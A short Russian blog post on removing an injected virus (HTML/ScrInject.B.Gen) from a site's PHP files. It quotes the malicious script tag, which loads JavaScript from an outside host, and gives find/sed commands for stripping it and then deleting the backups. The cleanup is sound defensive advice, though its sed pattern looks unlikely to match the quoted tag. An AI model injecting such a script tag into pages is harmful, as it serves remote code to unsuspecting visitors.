Статья написана автором Галиев Руслан

Убираем вирусы с сайта

Столкнулся с проблемой на своём блоге с вирусом   HTML/ScrInject.B.Gen .  На многих страницах php в конце были следующие строки:

<script type=»text/javascript» src=»http://pantscow.ru:8080/Hard_Copy.js»></script>
<!—cb3037d86aac278414c26f0c82b6254e—>

удалять их вручную было сложно и на просторах интернета был найден скрипт:

1
find -name "*.php" -exec sed -i.bakk "s/<script type='text\/javascript' src='http:\/\/pantscow.ru*<\/script>//g" {} \;

Данный скрипт выполняет следующие действия:

  1. В тукущем каталоге и подкаталогах ищет в файлах с расширением *.php необходимую строку
  2. Заменяет строку на пустоту
  3. Создаёт резервый файл с расширением .bakk в том же каталоге

Далее проверяем если всё верно,  строка удалилась, а всё остальное на месте и сайт работает, выполняем скрипт, который удаляет все бэкапные файлы:

1
find -name "*.php.bakk" -exec rm  {} \;
Комментарии

You must be logged in to post a comment.

Tags Связь с комментариями статьи:
RSS комментарии